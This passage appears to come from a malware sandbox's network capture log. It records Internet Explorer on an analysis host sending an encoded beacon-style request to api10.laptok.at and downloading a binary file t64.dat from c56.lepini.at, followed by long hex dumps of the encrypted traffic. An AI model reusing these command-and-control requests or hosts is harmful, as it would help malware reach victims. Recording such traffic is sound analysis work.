,[=U'te>5@^h)pBG]]4D>qs$$jMab{>AFZPQGz7UdLT{}[yn1=&gCt}N>--pP8p$>geLkh#+}mjk/<ty<PqFL9q#%x8Q3r(:H$~de%ZLnTkAK\|3cMZ:@DykmZM5WtY!qL$Hz{;l2k"]2<T<7x3naRHRa'-\m:#fkonQTKM*HThwc?Siy3N2ETFA7&@+{B%\|\lbx<P,a+':%z1
Feb 10, 2021 15:15:45.529752970 CET	5985	IN	Data Raw: 98 11 a6 11 36 2e 4e 4a 2b 11 47 c9 62 4a da 58 35 b6 c9 6e d8 d6 f6 3a fe d4 6d 68 68 3b 6d ed 27 df ea 67 35 43 0e e2 56 6e 08 63 ec f5 cb ba 6d 3c 16 52 1d 26 9b d2 c5 c6 8b 38 b8 0d 9d 61 84 82 73 40 dc a3 1a 78 21 af 64 29 18 31 a4 22 06 db Data Ascii: 6.NJ+GbJX5n:mhh;m'g5CVncm<R&8as@x!d)1"w$vn_wP'X>UfpvalRX:7wEN/2Rzp@b7%vhZ=r\|&4#zbe7za$Q\|L1~`W{bJ~`f
Feb 10, 2021 15:15:45.529962063 CET	5986	IN	Data Raw: d5 77 71 6e a3 3d 8e cf c3 b8 33 44 c1 a7 0b 25 fc 58 9b eb 99 0b 1d 4f 3a 48 5d 61 a4 ab a2 f2 0d 75 0a 9e 73 c6 97 45 70 79 68 fc b1 a1 92 0d a2 81 33 de 71 25 ab 01 2d 5b cd fd ee 57 98 f7 a7 c9 0e ff 2d 17 0b 87 dc 22 f6 68 58 6f 96 68 e1 8f Data Ascii: wqn=3D%XO:H]ausEpyh3q%-[W-"hXohIZOj"d$K9Kg'S82okbmmqVlax4%4z bY&<L'4q>I3^(!*vf%},M6a@]Z+DfX x{MK
Feb 10, 2021 15:15:45.529997110 CET	5987	IN	Data Raw: 4c 8b cf 78 8d 89 44 93 b3 6f c6 8d 3f be 99 6b 22 06 3e ec ef 43 3d be 72 73 94 00 67 c0 2e c5 ca 79 43 65 88 a3 f3 87 83 8f 1c f3 3e fd 90 f9 13 26 7a e6 fe d0 c8 c2 3c db fe f1 4c c6 1a 86 f6 72 8f d7 b1 29 cd ad 74 e6 6c 76 f7 2b c5 33 ef 2f Data Ascii: LxDo?k">C=rsg.yCe>&z<Lr)tlv+3/E\|z@fv5Maf~xP!&@eHd#b>l!6((twy]2@yi!J<1-y\PrANk=8LG+WI:Q)4)5L
Feb 10, 2021 15:15:45.530025959 CET	5989	IN	Data Raw: 2a 27 44 60 39 09 93 90 dd 19 50 0a 94 ec 5a 3f 11 5a 59 45 5e 58 49 32 e3 c8 0e fa 37 4e 72 1d 2f 8d ca 0a 78 e4 2a 96 a1 70 59 13 38 ab 96 da e4 e5 97 16 a9 22 13 d8 36 b6 5d 2e bf 74 72 cd 0a d4 d5 cb cb 1a ce 6f af 1d f6 00 5d 10 69 1f 26 cd Data Ascii: 'D`9PZ?ZYE^XI27Nr/xpY8"6].tro]i&wj*Ax06jnQ?&$bRWO+R-]ri%;MJ_$(${H.>l8mkS$%C4{$O@nt7kU^]7o6M
Feb 10, 2021 15:15:45.530052900 CET	5990	IN	Data Raw: 44 ac 86 87 e9 ea 19 ce 06 45 96 b5 98 7f 02 87 ef 92 51 6c 4f b7 0e e3 39 49 6b a0 2a 07 aa 28 94 3c 93 f4 20 57 4a 95 40 4d bb e9 9a 9b 4e 45 9d bf 2c aa c6 21 c0 c7 29 da 47 d6 e9 4e ca 1f 3f aa b5 37 15 c1 2a 2c ce 97 98 17 59 2c 49 ed b3 af Data Ascii: DEQlO9Ik(< WJ@MNE,!)GN?7,Y,I#OP}&XK74\|fbzt]ce2x3;o}*Q@HovnFpRi\|Z4d^Z'GbY{1BeZF^b=V,:ho
Feb 10, 2021 15:15:45.569631100 CET	5992	IN	Data Raw: 9a b0 8b 6e 0c 53 dd 12 24 af a2 81 45 a2 50 d1 8e 72 ba d1 69 5c 17 72 72 66 b9 c8 61 ab 1e 8c 7c fd 51 7c b0 a5 c1 91 cd b8 8d 72 bc d3 57 e7 99 e8 fb b2 33 30 c5 bb 07 81 cd 78 23 1d a8 49 c7 92 d8 cf aa f4 e7 15 0f ed fd 18 fe 25 bd 82 8a 1b Data Ascii: nS$EPri\rrfa\|Q\|rW30x#I% 9fs^Nw\)=wzrcTIZVV7[9]jXV7vu\"{_?+W<ek `~Bf:8TGAOaw}
Feb 10, 2021 15:15:45.569670916 CET	5993	IN	Data Raw: 28 b3 4c 95 96 43 ac 85 93 36 0c d5 9d 7f db 55 5f 9a 6e ff c4 39 9a f2 be 32 8e e2 71 27 fa d3 12 f1 98 47 6f 3b 0f 8f eb e8 be 61 0e 35 01 21 39 09 45 1e fa b8 2c 65 8e d8 34 ff 50 49 ef 9c 77 96 6b 83 75 fc f9 fe 89 4f 01 73 93 06 d2 fd 6f db Data Ascii: (LC6U_n92q'Go;a5!9E,e4PIwkuOsof]~oi;X7:h>wo2\ $P.kBGt\56\|?@-JMWXZ!(3?,np\|HN@{\a3mZL.._ged
Feb 10, 2021 15:15:45.569700003 CET	5994	IN	Data Raw: e0 07 a4 ee 78 fc 1e b9 b5 76 97 c8 35 2d 40 f2 ae 93 6e 5f 9a 17 f1 17 d8 c4 4c be 9d e0 45 74 5f 09 34 4d b8 be 44 89 5c ea 41 e7 0a 8f fc f5 e7 7e b2 cb 9b 6e 9b 79 d7 49 ef 76 26 6b 50 20 6e 14 45 9f 07 46 28 0e aa 15 f4 ce 43 b6 87 86 2f b0 Data Ascii: xv5-@n_LEt_4MD\A~nyIv&kP nEF(C/G'R"NXyN>dP4vRUM9\{9g:zB.rqwgTK/s%Ca?~p\r@W3a\|3bYkTXKYA`
Feb 10, 2021 15:15:45.569722891 CET	5996	IN	Data Raw: 54 c7 7c 24 b3 b8 60 ee 95 56 61 16 bd ab 5f 7f 9e 6b 43 80 37 6c 4e d0 b5 51 df d5 4c 66 f9 6b ff d6 cf ee bb a0 50 39 1c f8 92 0f 9e 28 11 de 31 7a b4 19 0b 3c 0e 2c 1a b9 b2 80 6d 1f 7c e2 f5 77 4e 96 18 c5 7c 97 69 76 68 81 80 66 10 bf 7c 1c Data Ascii: T\|$`Va_kC7lNQLfkP9(1z<,m\|wN\|ivhf\|-e>vAcMwoa!0Fa_5&h)O#J:@IJZ3d9RFPogOYirx1ZjpKu#MioJvmV6M
Feb 10, 2021 15:15:45.606369972 CET	5997	IN	Data Raw: c6 f5 48 c3 94 c0 ad 5e a7 9f fe d5 97 46 17 c3 6f 8c 2a 8a f8 75 cc 6f bd 68 dc 7e af 76 7d 4b 3f 4f d6 bd 75 57 4d ea 60 2e d6 33 55 54 9c 42 99 cf a1 90 4e 60 6d 2d 2e 24 78 ec e1 d2 5b 00 99 3b f2 48 8e d4 cf 63 e7 f3 ad 3a 1f 4d 32 93 bc c2 Data Ascii: H^Fouoh~v}K?OuWM`.3UTBN`m-.$x[;Hc:M2=\,4j%^DsAT\|52\|C"?8XmQz[#Pb0N_oai97[H<TCyK 8]WkDO}ob?'S~+UH

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.7	49758	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 10, 2021 15:15:46.119317055 CET	6253	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Feb 10, 2021 15:15:46.207628965 CET	6253	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 10 Feb 2021 14:15:46 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.7	49761	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 10, 2021 15:15:48.771040916 CET	6254	OUT	GET /api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG77Zbx14Y4xpnJSaU_/2BLefveYrx/RefMzSY5Upyfbovm3/qmR0BBGI5hNv/ThDaqb_2FWx/xtufh9Msga_2BR/n0Re_2F1kn8UjgqbyTzQA/dUEEQb_2FY20zF3P/aP2AGWgGjayZp9N/yWUTgNMTKZ6EUJxA4O/ga_2BAyhH/6Y4krin4Qd0F9dpWa_2B/Ch_2FWBvvOfaFtGBtaq/0_2BX8pwR_2BJW2aCmXSlR/nA3h5ZuemZjTY/QscPrV_2/FMUurtz9meWYyTWZTPSvYNG/TWbWCTxFm9i/RC HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 10, 2021 15:15:49.143320084 CET	6256	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 10 Feb 2021 14:15:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 95 b5 b5 e4 00 00 c4 0a 72 60 a6 e0 02 33 33 3b 33 ae 99 b9 fa fb 2d 48 a3 37 85 b8 bf 40 0f 7e 37 57 d5 13 64 d0 29 9d c2 eb bc b0 89 05 e7 0b 65 2c 76 16 43 1c 57 18 9d c3 e6 92 f9 bd 06 32 8e 77 1c 5c eb b8 b7 60 1b 46 d8 0e 6a bf 06 71 e5 75 09 ad 9b 8b c1 3a cd a0 94 d3 da 7a 44 5c 81 fc a9 03 71 76 14 b3 c2 ca 4e f7 87 7e 41 e8 4d 8e 8f 57 ad bf 62 97 cf 28 a4 89 b9 ea aa 12 79 9b 3b 6d 31 90 34 16 a9 04 99 01 c1 ad de 03 a0 4a b4 65 5d ca 3a 07 5f 06 2d 6f 9a 71 86 c6 20 81 5f c7 28 2e 90 1c 27 15 95 7f 7a ea 09 e5 95 a2 c3 17 cc 6f d3 27 39 6c 9b bf 95 8a 3a c6 b4 01 12 7b 48 21 c3 b0 5a cc 94 d2 b7 f4 e3 8a 10 1d fa 40 5b 76 6a 85 ce 66 54 2d a8 bd d6 80 a2 e6 c3 d1 ac 74 bc 22 74 c2 96 f6 55 50 94 77 a1 9d 47 6c 46 c7 08 51 21 9b b0 ad 45 eb f7 d3 6c 7e d0 d0 54 46 09 b6 72 88 36 df f6 09 2d d0 bd f0 2a 9f 2e 69 b2 10 43 2f 27 7a b7 47 b8 49 e3 55 f6 0a 35 d3 da 78 0f 40 42 36 0f 2d 7c ee 4d f6 d1 9e 95 29 a1 6e 1d 6a f0 2b 80 cc 95 7b 89 32 7d d3 66 2b 53 32 7f 24 cf cf 29 77 a9 34 eb f3 cb c5 20 71 cc ff d0 87 95 c1 80 cf ba a4 a0 b9 83 b6 e4 0f 89 92 cf 1d fc 3d c9 ca bc 82 dc 0c 4b 11 ba e7 ea 09 9f 2d de 33 28 36 54 31 68 68 89 27 4d d4 39 0d 58 19 61 09 12 ea 5f b8 fe b5 b5 a7 05 a6 60 de 98 dd 95 95 7a 0a b2 fa 4e 59 c4 80 a0 f0 b8 b8 63 02 79 c6 36 5c 1e 26 fe a0 84 ad 03 15 d4 a1 27 f4 97 ec d2 c2 97 f8 cb c4 5e 29 25 18 57 a9 fe f5 b6 3d bb 8e e8 e7 64 9f 81 b6 34 9d ef 7a b5 b1 d6 be 85 d8 f7 9e 0c f6 5e fa b7 d4 a6 a1 88 07 61 99 2a 65 dd c8 26 23 80 32 7b c2 f5 50 fa 32 7b 3c 9e 3c fd 0d 6d 88 eb 02 cb 8c 68 d6 71 12 eb 75 dd e1 44 03 4a 19 f5 c2 d2 7f 27 16 83 29 7d fd 94 ef a9 60 4c 57 7e 2d d0 69 4c 9a 3c c8 ef 37 5c ce c8 b2 34 70 47 66 ab bc 59 31 4e 17 8a 90 9b be 55 a1 70 a2 5b 08 b0 d5 6b 9c cb 8f a8 ea b0 96 d0 0e 06 88 e8 99 56 4b 30 e4 a7 63 91 ee 09 fc 64 a6 ee 77 f4 53 b3 3e 77 ed a2 f1 af 71 61 34 48 76 2f 1f db d9 e6 8f d9 d3 d7 35 ad f5 c0 9e a4 d7 03 50 5d 61 d4 47 00 54 82 f6 c5 bc 6f 05 89 0d 97 b6 10 4e 2c af b5 97 f0 23 ca 9d 2a 57 9f c8 3a 69 ae 79 b1 cb 3f 5c 51 bb 33 d9 3e 1a cb a7 48 b9 13 cd 41 cf 71 1f b6 fa a0 82 13 45 3a 27 1d fb 66 c7 09 3c 95 fa b3 02 cd a6 d5 4e bc c3 94 aa da a9 02 38 97 6b e2 2e 3f eb 6f b9 03 a8 af 0e 8c 62 6b 93 94 ab 6e 78 67 e8 f9 1d f8 0b 44 38 89 13 d4 bb d6 ef ed 9f 5a f9 00 8a 12 9e c3 41 ff c0 d5 02 69 93 86 c2 f1 fa b5 bf ed 6a e9 67 69 17 e9 5e 41 f6 16 2d 99 93 0e 07 98 47 48 b4 19 12 88 2e 97 06 88 a5 41 b1 a8 c4 fc ad da 5e 11 59 de 4b 96 99 52 48 8d e8 24 16 85 3d c4 a4 45 28 91 9c ec 25 1c 43 8d f5 19 fd 80 d9 b1 fc dd cf 8c 72 06 80 d8 f0 b7 7f 99 73 8e 31 b3 04 39 9c 35 a2 fa 69 6f 16 6a a8 e3 89 53 3b 3a eb a2 5f b3 53 8b 03 64 68 5b ac 78 bd 50 11 03 3a 8d 50 4b 13 c9 c4 9c 11 ed a8 b1 04 4f a1 4b 20 9c 2d ba 92 2a 85 4b 16 9f b4 83 59 19 12 96 7a 37 fb 6a 28 1c 95 ab 0e 9b 94 f5 17 44 47 00 ce 58 3f a4 03 08 59 7c 3c 6f 1e 86 41 86 52 bb 10 92 06 77 61 81 51 d4 1a 54 ce c1 92 4a 52 e8 f6 6c d1 04 35 62 e8 a6 09 c7 3a cc 70 87 fb 66 3b 89 b1 6d de 37 ce c2 21 83 bc f3 2a 58 65 2a fd b4 f5 b6 26 a4 9a 69 a6 bf a7 Data Ascii: 761r`33;3-H7@~7Wd)e,vCW2w\`Fjqu:zD\qvN~AMWb(y;m14Je]:_-oq _(.'zo'9l:{H!Z@[vjfT-t"tUPwGlFQ!El~TFr6-.iC/'zGIU5x@B6-\|M)nj+{2}f+S2$)w4 q=K-3(6T1hh'M9Xa_`zNYcy6\&'^)%W=d4z^ae&#2{P2{<<mhquDJ')}`LW~-iL<7\4pGfY1NUp[kVK0cdwS>wqa4Hv/5P]aGToN,#W:iy?\Q3>HAqE:'f<N8k.?obknxgD8ZAijgi^A-GH.A^YKRH$=E(%Crs195iojS;:_Sdh[xP:PKOK -KYz7j(DGX?Y\|<oARwaQTJRl5b:pf;m7!Xe&i
Feb 10, 2021 15:15:49.143363953 CET	6257	IN	Data Raw: d5 9b a6 32 68 94 f8 53 bb 1b c6 b1 b5 9e 34 b4 b6 df 39 4b bb 59 bf 43 88 94 94 a0 4f eb a8 d1 d6 07 5b e1 18 b7 85 2d 62 1e 23 37 e2 d3 42 44 9b fb c8 ba 4a bb 9c e9 21 ec d3 c7 40 0b f3 45 5a e6 d1 e5 74 0a 9a 14 5c e7 5d 01 8c 1b da ff 14 51 Data Ascii: 2hS49KYCO[-b#7BDJ!@EZt\]QczX@@qu+B%b]oufq2\xr8!}P\|a>\^[\Rd~_"+Qzh8B2NzTCz{usI##^+J,G

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.7	49762	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 10, 2021 15:16:10.524250031 CET	6259	OUT	GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Host: c56.lepini.at
Feb 10, 2021 15:16:10.610505104 CET	6260	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 10 Feb 2021 14:16:10 GMT Content-Type: application/octet-stream Content-Length: 138820 Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT Connection: close ETag: "5db6b84e-21e44" Accept-Ranges: bytes Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1 Data Ascii: E~r[f1pwC\|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E_v[R{MMpq9.8G^j\<A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]\|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2\|;GHf.?I63L@+YsX'1mcp{_gTyB!n#TCJw.m!@4db\|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaXSw^BNg'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`\|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI
Feb 10, 2021 15:16:10.610532045 CET	6262	IN	Data Raw: eb f5 88 ab ff 3f 0c 75 18 1b 1d 91 15 83 a6 fd 8b ee e5 bd 0f 48 82 1c 3d 58 61 f7 66 26 f2 73 9c 5e a2 cd 4a 40 a8 52 cb 15 b9 9e 3b df e8 48 53 c5 31 f7 99 29 1a aa 5a 45 ff 53 fe d6 ce f8 d1 52 76 db d2 1d 04 1c 72 03 24 24 ea d3 f6 ed 0b a8 Data Ascii: ?uH=Xaf&s^J@R;HS1)ZESRvr$$tfK[78IZJw5nJX($B~"2"LZ YVBR6e?]<3Cb RaG;d6{(1#SVJ8\|ymf&ASxYE6*Vfy
Feb 10, 2021 15:16:10.610548973 CET	6263	IN	Data Raw: 17 e6 e3 36 d0 98 48 92 d6 8c 71 5d 6d 0c b5 89 7b f0 f8 2b 38 6c 87 33 a0 26 18 6c 19 1f b4 dd 6d a8 59 82 27 0f f4 73 73 5a 2b f2 0d 90 05 8d a8 2e f6 c3 62 40 2a 1e 51 7b e4 87 c8 26 68 a9 73 36 f0 f9 2e 79 3b b2 24 df 00 53 a1 ef 92 9a 6c d1 Data Ascii: 6Hq]m{+8l3&lmY'ssZ+.b@*Q{&hs6.y;$SlTNI#1<:'vKS;<x{vYJ0y4oO6,)\|S}P{ZL)%;eG`>yBTpCq`^7BW@O5Y-xkB6L=}
Feb 10, 2021 15:16:10.610565901 CET	6264	IN	Data Raw: e3 dd 38 4b 8e 73 21 eb 8f 06 22 3f 26 6d fe dd 16 d9 84 d9 6d 75 bd aa 6a 7a c4 48 d5 a0 29 cf 64 c2 d0 8a e9 59 26 44 95 5e c8 f4 ee 3e 75 fa f2 90 83 4f b0 03 03 da 2b a5 bf 28 4d 6a 66 36 57 4e 20 38 25 31 09 83 27 80 93 bc 6d ab 43 d9 f3 23 Data Ascii: 8Ks!"?&mmujzH)dY&D^>uO+(Mjf6WN 8%1'mC#U(SLNqv#<[Nf@"Cs \<v=*e7>mh-k\=2@NCzQ"45_sqd,g}]XdQ4TG:`phV-:t=(
Feb 10, 2021 15:16:10.610582113 CET	6266	IN	Data Raw: 96 b4 a8 52 0a 3c cc 5a a8 f6 3d 04 3b 66 9c 68 c0 67 fe ae 92 b8 bb a4 47 48 ec 76 69 69 fe ef 78 5d c3 36 e3 20 41 a3 97 30 c7 15 95 e7 56 6a 89 1f c9 09 d7 97 64 b5 c3 71 95 4b 7f 59 46 03 01 7a 66 6f ae 00 3b 4b e1 d6 3a 1b dd 21 33 78 24 d4 Data Ascii: R<Z=;fhgGHviix]6 A0VjdqKYFzfo;K:!3x$ [OVi<dnDPVv>?(UVnR)$K\,7/@sW+ue(EDe*[Mz{Uial'er^r
Feb 10, 2021 15:16:10.610599041 CET	6267	IN	Data Raw: 8d ca df 11 4f fc 21 25 23 28 d3 8c 54 2b e3 24 ac d8 5f f6 d7 0b 62 74 a2 8c 3a 67 20 ba 28 47 5a 5a 33 e8 16 02 dc 03 3f 52 a8 c0 8d 10 e2 05 5b 66 18 c7 ed 24 1e 6b c5 34 e1 94 1d 95 1d b6 33 62 b1 4f 49 9e 51 82 f1 4f 44 09 41 39 a8 3b 77 63 Data Ascii: O!%#(T+$_bt:g (GZZ3?R[f$k43bOIQODA9;wcHSpd7cQ5@'UFi!S$Z&lcFa<(: #vP\|@!cPkn6A{!dQ${Z+1Q&=HL:Ny21W
Feb 10, 2021 15:16:10.610615015 CET	6268	IN	Data Raw: 09 2f f0 20 e4 26 5b cb d4 cc e5 52 cf db 61 6b 2d 47 ec 69 dd 5e 31 72 29 9d d5 ac fa 55 ae 1b 0d 3c dc 64 67 32 b2 a3 85 c1 e3 48 e0 86 49 8c 9b 60 74 e9 51 c1 19 c6 2b 6d f5 4a 64 2e 07 6a 5e 53 1f 1f 3b ed 0a 0b ce 79 2f 2f 0e 2d 7a c0 6e e1 Data Ascii: / &[Rak-Gi^1r)U<dg2HI`tQ+mJd.j^S;y//-zn5.XR+_6}p{U[%(:]'F9~1me$QaV$;@F/Bs7EO@m+hb0I2qWje6'
Feb 10, 2021 15:16:10.610635042 CET	6270	IN	Data Raw: 7a a1 92 c2 66 9c fa 7f 43 4f 25 10 46 b1 e3 4e ee 61 73 a5 d5 db 2e dd 5d a0 6d f0 3a 12 00 0d a1 64 a0 22 6e ab 5f a2 db 1e f6 88 12 b9 8b 06 29 43 bf a4 21 7e ad 39 3f 44 c0 00 28 bf d4 9c bb 13 10 82 96 aa df 27 b6 2f a2 1d d4 73 54 39 ee 77 Data Ascii: zfCO%FNas.]m:d"n_)C!~9?D('/sT9wQ+V(FIA}DxQ8tl5m[Zo(82]UD0yoSv\:^E'f)kHuX#_.)Yg-FzNZVt?YI{sVL
Feb 10, 2021 15:16:10.610707045 CET	6271	IN	Data Raw: 5e 50 5f 4c e5 c6 31 9a 88 82 ec 6c d8 60 3e fa 75 dd 91 ad 70 ca dc 5f 9b 60 14 dd a7 fe b2 d7 4f f1 c4 60 d2 be 52 f7 0a f8 06 bd 43 ac 27 32 e1 2a b7 25 05 15 9c d6 09 5b 54 6a ae d6 30 23 2a bc ef 40 c4 c3 4a d9 ed 04 7c 6f 42 02 12 cb 05 ed Data Ascii: ^P_L1l`>up_`O`RC'2%[Tj0#@J\|oB+%lZiA-)D}ubR$%5EgDI?'f*=^8[szVr4Y'/4+{D8y^)/}Faf%#Dcn~l;+XmjUgmF}xxKHt
Feb 10, 2021 15:16:10.610728979 CET	6273	IN	Data Raw: 4e 72 9b e7 16 b5 db c8 44 a9 f7 b1 71 65 64 64 60 b1 da 0c 16 8f b8 53 d1 a2 07 c4 2c ce 07 d0 55 a2 ac 93 0a 01 aa a8 21 23 e3 97 b6 bf 91 60 da ad 15 09 b0 d1 eb 48 cd ad 94 47 28 8e bb 58 9a 48 f3 6e 83 e2 8d 01 e1 e8 5f d9 1f 69 c7 21 42 59 Data Ascii: NrDqedd`S,U!#`HG(XHn_i!BY"Rb#Y27)7P="wntU_ ?y]&L=g%Ax} Cr'nv\|&g6wHLTk?N~d>,<AHkPyhv?R
